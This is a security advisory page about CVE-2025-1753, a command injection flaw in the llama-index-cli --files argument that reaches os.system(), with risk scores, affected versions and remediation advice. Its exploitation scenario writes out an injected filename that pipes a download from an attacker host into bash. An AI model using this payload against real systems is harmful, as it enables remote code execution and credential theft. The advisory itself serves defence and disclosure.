CVE-2025-1753: llama-index-cli: OS command injection enables RCE

Published May 28, 2025

CISO Take

LlamaIndex CLI (prior to v0.4.1) contains an OS command injection flaw where the --files argument is passed unsanitized directly to os.system(), allowing an attacker to execute arbitrary shell commands on the host with the privileges of the running process. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 84th percentile for exploitation likelihood, the blast radius across the LlamaIndex ecosystem is significant — and the trivial exploitation path (low complexity, no user interaction, no special privileges beyond local access) means weaponization requires virtually no skill. Critically, the attack surface extends well beyond local use: any web application that invokes the LlamaIndex CLI with user-supplied filenames is exposed to remote code execution with full confidentiality, integrity, and availability impact. Patch immediately to llama-index-cli ≥ 0.4.1 (corresponding to llama-index ≥ 0.12.21), and audit all code paths that pass external input to the CLI — reject any filename arguments containing shell metacharacters as an interim control.

Sources: NVD EPSS GitHub Advisory ATLAS huntr.com

Risk Assessment

High risk. CVSS 7.8 with complete C/I/A impact (C:H/I:H/A:H). The nominal local attack vector (AV:L) understates real-world exposure: any web application wrapping the CLI for document processing tasks creates a direct remote exploitation path. Low attack complexity and no user interaction required make this a low-barrier exploit. EPSS at the 84th percentile signals elevated real-world exploitation probability relative to the CVE population. The combination of 227 downstream dependents, 12 prior CVEs in the package, and a package risk score of 58/100 indicates systemic security debt in this component. Not yet in CISA KEV and no public exploit confirmed, but the exploitation path is trivially constructable from the public description.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
llama-index	pip	—	No patch
48.3K 227 dependents Pushed 3d ago 87% patched ~50d to patch Full package profile →
llama-index-cli	pip	< 0.4.1	`0.4.1`
48.3K 227 dependents Pushed 3d ago 87% patched ~50d to patch Full package profile →

Severity & Risk

CVSS 3.1

7.8 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 16% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Trivial

Recommended Action

Patch immediately: upgrade llama-index-cli to ≥ 0.4.1 and llama-index to ≥ 0.12.21.
Audit all code that invokes the LlamaIndex CLI and identify every path where --files values derive from user-controlled input.
If patching is not immediately possible, sanitize filename arguments before passing to the CLI — implement an allowlist of safe filename characters and reject any input containing shell metacharacters (;, |, &, $, backtick, parentheses, angle brackets).
Run the CLI in a sandboxed environment (container with dropped capabilities, read-only filesystem where possible, seccomp profile blocking exec syscalls) to limit blast radius.
For detection: monitor for anomalous child processes spawned from LlamaIndex processes, unexpected outbound network connections from document processing workers, or shell interpreter invocations in AI pipeline environments.

Classification

Code Execution Supply Chain Framework Agent AML.T0010.001 - AI Software AML.T0010.005 - AI Agent Tool AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.7.3 - AI System Development

NIST AI RMF

MANAGE 2.2 - Mechanisms to respond to AI risks

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

LLama-Index CLI prior to v0.4.1, corresponding to LLama-Index prior to v0.12.21, contains an OS command injection vulnerability. The vulnerability arises from the improper handling of the `--files` argument, which is directly passed into `os.system`. An attacker who controls the content of this argument can inject and execute arbitrary shell commands. This vulnerability can be exploited locally if the attacker has control over the CLI arguments, and remotely if a web application calls the LLama-Index CLI with a user-controlled filename. This issue can lead to arbitrary code execution on the affected system.

Exploitation Scenario

An attacker targeting an organization with a LlamaIndex-powered document ingestion API submits a crafted HTTP request where the filename field contains an injected shell command — for example, report.pdf; curl http://attacker.com/payload.sh | bash. The backend application, treating the filename as benign input, passes it to the LlamaIndex CLI via the --files argument. The CLI calls os.system() with the full unsanitized string, executing the attacker's payload with the privileges of the application process. The attacker establishes a reverse shell, exfiltrates the RAG database contents and any API keys or credentials in the environment, then pivots to connected AI infrastructure such as the vector database or model serving endpoints.